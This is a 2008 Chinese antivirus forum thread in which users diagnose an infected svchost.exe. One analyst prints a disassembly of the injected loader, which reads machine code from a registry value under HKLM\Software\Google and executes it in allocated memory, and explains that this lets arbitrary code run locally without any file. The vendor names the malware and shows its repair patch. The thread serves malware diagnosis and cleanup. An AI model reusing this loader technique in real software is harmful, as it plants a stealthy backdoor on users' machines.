麻烦高人鉴定一下这个可疑文件. - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 可疑文件交流麻烦高人鉴定一下这个可疑文件.

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第四十七次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

1

1 / 1 页

跳转页

麻烦高人鉴定一下这个可疑文件.

红卫兵1 初生襁褓狮帖子:11 注册: 2005-12-28 来自:	发表于： 2008-10-28 01:32 \| 只看楼主短消息资料字号：小中大 1楼麻烦高人鉴定一下这个可疑文件. c:\widnows\system32\svchost.exe 已压缩为122.RAR 病情(前两天急用一个软件,比较大的/为了提高下载速度,把机器DMZ到公网了.结果这两天明显机器有问题. 系统是XP SP2,所有更新由360下载.声卡和驱动已证实是没问题的. 声音被无端禁用,开始以为是驱动出问题了,于是重装,结果反复弄了几次,每次正常后,下面的工具栏突然变白一阵,然后恢复到蓝色,声音就不能用了.重装驱动重起电脑就可以用了,但过一会儿问题重复. 网页大多数时间一次打不开,要刷新一次才能打开.360也被恶意禁用过一次,我修复了. 用瑞星和360在安全模式下全盘杀毒,无病毒或者木马. 今天瑞星弹出气球发现威金,已删除.可那病毒过一会儿就又出现.) 用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 1.7; CIBA) 附件: 您所在的用户组无法下载或查看附件
红卫兵1 初生襁褓狮帖子:11 注册: 2005-12-28 来自:	分享到：

超级游戏迷卡卡技术团队帖子:25779 注册: 2007-01-14 来自:	发表于： 2008-10-28 01:35 \| 短消息资料字号：小中大 2楼回复: 麻烦高人鉴定一下这个可疑文件. 原帖源自这里：http://bbs.ikaka.com/showtopic-8561260.aspx 这个SVCHOST.EXE应该是被病毒感染了，可能那个DLL文件也自我毁灭了，日志中也无法找到其踪迹…… 关注中！打酱油的……
超级游戏迷卡卡技术团队帖子:25779 注册: 2007-01-14 来自:

红卫兵1 初生襁褓狮帖子:11 注册: 2005-12-28 来自:	发表于： 2008-10-30 16:45 \| 只看楼主短消息资料字号：小中大 3楼回复：麻烦高人鉴定一下这个可疑文件. 谢谢工程师. 那我放心了.
红卫兵1 初生襁褓狮帖子:11 注册: 2005-12-28 来自:

genhao3 初生襁褓狮帖子:45 注册: 2008-10-22 来自:	发表于： 2008-10-30 17:03 \| 短消息资料字号：小中大 4楼回复: 麻烦高人鉴定一下这个可疑文件. 应该不是毒，系统文件吧！病毒主要是看位置
genhao3 初生襁褓狮帖子:45 注册: 2008-10-22 来自:

轩辕小聪卡卡技术团队帖子:8368 注册: 2006-01-09 来自:	发表于： 2008-10-31 14:01 \| 短消息资料字号：小中大 5楼回复: 麻烦高人鉴定一下这个可疑文件. 是不是病毒不知道，但是文件被修改，并且可以导致本地运行任意代码，这是事实。看下面结果。 01002536 \|. 68 20400001 push 01004020 ; /pCriticalSection = svchost1.01004020 0100253B \|. A3 4C400001 mov dword ptr [100404C], eax ; \| 01002540 \|. A3 48400001 mov dword ptr [1004048], eax ; \| 01002545 \|. FF15 88100001 call dword ptr [<&KERNEL32.Initialize>; \InitializeCriticalSection 0100254B \|. FF15 84100001 call dword ptr [<&KERNEL32.GetCommand>; [GetCommandLineW 01002551 \|. 50 push eax 01002552 \|. E8 C52E0000 call 0100541C ; address of main function has been changed 0100541C 60 pushad 0100541D B8 519A807C mov eax, kernel32.VirtualAlloc 01005422 6A 00 push 0 01005424 6A 40 push 40 01005426 68 00100000 push 1000 0100542B 68 00200000 push 2000 01005430 6A 00 push 0 01005432 FFD0 call eax ; kernel32.VirtualAlloc 01005434 96 xchg eax, esi ; esi=address of allocated memory 01005435 B8 1BC4DC77 mov eax, ADVAPI32.RegOpenKeyA 0100543A 50 push eax 0100543B 54 push esp 0100543C E8 11000000 call 01005452 01005441 ASCII 'Software\Google',0 01005452 68 02000080 push 80000002 01005457 FFD0 call eax ; RegOpenKey(HKEY_LOCAL_MACHINE,Software\Google) 01005459 59 pop ecx 0100545A B8 8378DA77 mov eax, ADVAPI32.RegQueryValueExA 0100545F 6A 03 push 3 01005461 89E2 mov edx, esp 01005463 68 00200000 push 2000 01005468 54 push esp 01005469 56 push esi 0100546A 52 push edx 0100546B 6A 00 push 0 0100546D E8 12000000 call 01005484 01005472 ASCII '00:0A:EB:1F:20:05',0 01005484 51 push ecx 01005485 FFD0 call eax ; RegQueryValueEx(hKey,'00:0A:EB:1F:20:05',buffer) 01005487 58 pop eax 01005488 58 pop eax 01005489 58 pop eax 0100548A FFD6 call esi ; call buffer 0100548C 61 popad 0100548D 90 nop 0100548E 68 B1220001 push 010022B1 ; jump back 01005493 C3 retn 病毒样本请发到可疑文件交流区
轩辕小聪卡卡技术团队帖子:8368 注册: 2006-01-09 来自:

轩辕小聪卡卡技术团队帖子:8368 注册: 2006-01-09 来自:	发表于： 2008-10-31 14:06 \| 短消息资料字号：小中大 6楼回复：麻烦高人鉴定一下这个可疑文件. 结论： 6楼结果表明，svchost.exe的初始化代码被修改，指向文件尾部新加入的代码。新加入的代码通过读取预先已经写入注册表 [HKEY_LOCAL_MACHINE\Software\Google] 路径下的 "'00:0A:EB:1F:20:05"键的二进制数值，将内容读入新申请的一块内存然后直接call入这块内存中，运行其中的代码。运行完毕后跳回原来函数，继续执行。联系到实机，只需要在注册表 [HKEY_LOCAL_MACHINE\Software\Google] 路径下的 "'00:0A:EB:1F:20:05"键值中写入需要运行的代码二进制机器码内容利用此svchost.exe就可以实现运行该代码的目的。综上，此svchost.exe将会导致可以本地执行任意代码。注：svchost.exe被加入代码中的API地址，属XP SP2下的硬编码，应是病毒感染svchost.exe时即时写入的。轩辕小聪最后编辑于 2008-10-31 14:14:51 病毒样本请发到可疑文件交流区
轩辕小聪卡卡技术团队帖子:8368 注册: 2006-01-09 来自:

轩辕小聪卡卡技术团队帖子:8368 注册: 2006-01-09 来自:	发表于： 2008-10-31 14:20 \| 短消息资料字号：小中大 7楼回复: 麻烦高人鉴定一下这个可疑文件. 引用: 原帖由超级游戏迷于 2008-10-28 1:35:00 发表原帖源自这里：http://bbs.ikaka.com/showtopic-8561260.aspx 这个SVCHOST.EXE应该是被病毒感染了，可能那个DLL文件也自我毁灭了，日志中也无法找到其踪迹…… 关注中！从我上面的分析可以看出，根本就不需要dll了，不需要任何显式的“文件”了，只需要把二进制代码写入注册表键值，它就跑起来了，就跟利用漏洞的网马shellcode一样，只不过那个是远程执行，这个是本地执行。病毒样本请发到可疑文件交流区
轩辕小聪卡卡技术团队帖子:8368 注册: 2006-01-09 来自:

超级游戏迷卡卡技术团队帖子:25779 注册: 2007-01-14 来自:	发表于： 2008-11-01 18:17 \| 短消息资料字号：小中大 8楼回复: 麻烦高人鉴定一下这个可疑文件. 引用: 原帖由轩辕小聪于 2008-10-31 14:20:00 发表从我上面的分析可以看出，根本就不需要dll了，不需要任何显式的“文件”了，只需要把二进制代码写入注册表键值，它就跑起来了，就跟利用漏洞的网马shellcode一样，只不过那个是远程执行，这个是本地执行。虽然代码分析部分看不懂，不过总算了解了大致原因所在…… 超级游戏迷最后编辑于 2008-11-01 18:18:37 打酱油的……
超级游戏迷卡卡技术团队帖子:25779 注册: 2007-01-14 来自:

RisingCSC 在线技术支持工程师帖子:4368 注册: 2008-02-26 来自:	发表于： 2008-11-04 10:09 \| 短消息资料字号：小中大 9楼回复：麻烦高人鉴定一下这个可疑文件. 病毒名：Win32.Agent.cl 文件：svchost.exe 瑞星杀毒软件版本：20.69.02 站内导航：新人报道 \| 反病毒/反流氓软件 \| RAV/RIS求助 \| RFW求助 \| 卡卡助手求助热点推荐： RIS2009有奖征文 \| 春节活动汇总
RisingCSC 在线技术支持工程师帖子:4368 注册: 2008-02-26 来自:

轩辕小聪卡卡技术团队帖子:8368 注册: 2006-01-09 来自:	发表于： 2008-11-04 10:33 \| 短消息资料字号：小中大 10楼回复: 麻烦高人鉴定一下这个可疑文件. 引用: 原帖由 RisingCSC 于 2008-11-4 10:09:00 发表病毒名：Win32.Agent.cl 文件：svchost.exe 瑞星杀毒软件版本：20.69.02 不是把开头的代码改回来，而是把增加的代码的前面内容给nop掉： 01005486 90 nop 01005487 90 nop 01005488 90 nop 01005489 90 nop 0100548A 90 nop 0100548B 90 nop 0100548C 90 nop 0100548D 90 nop 0100548E 68 B1220001 push 010022B1 01005493 C3 retn 虽然说的确是能正常运行了，但是既然可以做到这样，为什么不干脆把开头的代码改回来呢？还是说，这个感染是多态变形的，不好找被修改的原代码位置，所以才采取这样的方式？病毒样本请发到可疑文件交流区
轩辕小聪卡卡技术团队帖子:8368 注册: 2006-01-09 来自:

<<上一主题|下一主题>>

1

1 / 1 页

跳转页

页面顶部

Powered by Discuz!NT